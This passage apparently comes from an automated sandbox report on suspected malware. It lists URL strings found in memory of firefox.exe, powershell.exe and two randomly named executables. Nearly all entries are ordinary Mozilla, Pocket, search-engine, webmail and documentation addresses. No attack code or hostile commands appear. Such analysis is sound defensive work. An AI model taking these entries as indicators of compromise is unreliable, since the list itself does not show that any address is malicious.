Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDE96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDE96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDE96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000022.00000003.2706915349.0000019CFCF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2869247332.0000019CF95CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: c92938c010.exe, 00000010.00000003.2606708211.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: c92938c010.exe, 00000010.00000003.2606708211.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2866287245.0000019CF8BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000022.00000003.2838031242.0000019D05A6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000022.00000003.2838238033.0000019D05A5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2881255814.0000019CFB200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.2895818368.0000019CFDB67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: powershell.exe, 0000000E.00000002.2606762712.0000028D1B30C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2606762712.0000028D1B30C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2606762712.0000028D1B30C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000022.00000002.2866895836.0000019CF8CA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000022.00000003.2706915349.0000019CFCF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2934268924.00001E5021A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD924000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: c92938c010.exe, 00000010.00000003.2553366123.0000000005D47000.00000004.00000800.00020000.00000000.sdmp, c92938c010.exe, 00000010.00000003.2553274997.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, 2bd330404c.exe, 00000011.00000002.2948007674.0000000001172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2813923577.0000019CFE8AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2868138373.0000019CF917D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711012212.0000019CFB02C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711421911.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2879851015.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711012212.0000019CFB02C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711421911.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2879851015.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF96B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2803693593.0000019D0588D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2927658878.0000019D05885000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2828092027.0000019CFE281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF963C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF96B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2803693593.0000019D0588D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2927658878.0000019D05885000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF96B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2803693593.0000019D0588D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2927658878.0000019D05885000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2914059099.0000019CFF634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF96B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2803693593.0000019D0588D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2927658878.0000019D05885000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabhttps://getpocket.com/explore/te
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabfirefox-desktop-opaqueRespons
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2914059099.0000019CFF634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabHandles
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000003.2838640090.0000019D05A27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morecleanUpFlightImpressionPref/
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-highlights-option-saved-to-pocket
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2914059099.0000019CFF634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsDisplays
Source: firefox.exe, 00000022.00000002.2874143736.0000019CFA503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0CBC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2869247332.0000019CF95B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cfworker__absolute_recursive_ref__Instance
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000022.00000002.2928377174.0000019D059AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000022.00000002.2928377174.0000019D059AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000022.00000003.2706915349.0000019CFCF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707461103.0000019CFD13E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707211364.0000019CFD120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2707697289.0000019CFD15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2708005438.0000019CFD17B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsUrgent
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla/webcompat-reporterhandleTopSitesSponsoredImpressionStats
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDE96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2898252938.0000019CFDE96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: powershell.exe, 0000000E.00000002.2582645797.0000028D0BED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gpuweb.github.io/gpuweb/Unexpected
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000022.00000003.2838640090.0000019D05A27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000022.00000002.2866287245.0000019CF8BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2930962305.0000019D06F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submitEnable
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000022.00000002.2906486113.0000019CFEAD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema.
Source: firefox.exe, 00000022.00000002.2906486113.0000019CFEAD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema./
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schemaresource://gre/modules/JsonSchema.sys.mjsshowUpdateDownl
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: firefox.exe, 00000022.00000002.2906486113.0000019CFEAD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema/
Source: firefox.exe, 00000022.00000002.2906486113.0000019CFEAD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schema/=
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2020-12/schemaNetworkError
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000022.00000002.2904457725.0000019CFE803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000022.00000002.2891150396.0000019CFD457000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2895818368.0000019CFDB9A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2869247332.0000019CF951D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2895818368.0000019CFDBE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2920221170.0000019D00816000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2934609680.00001F74F7B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comratios
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2920221170.0000019D00816000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2918649954.0000019CFFE6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.comapp.normandy.startupRolloutPrefs.08a40f72-8958-46f3-8b0d-9bdc1571b5
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA2D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711012212.0000019CFB02C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711421911.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2874143736.0000019CFA51F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2879851015.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFABBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2868138373.0000019CF917D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711012212.0000019CFB02C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.2711421911.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2879851015.0000019CFB033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
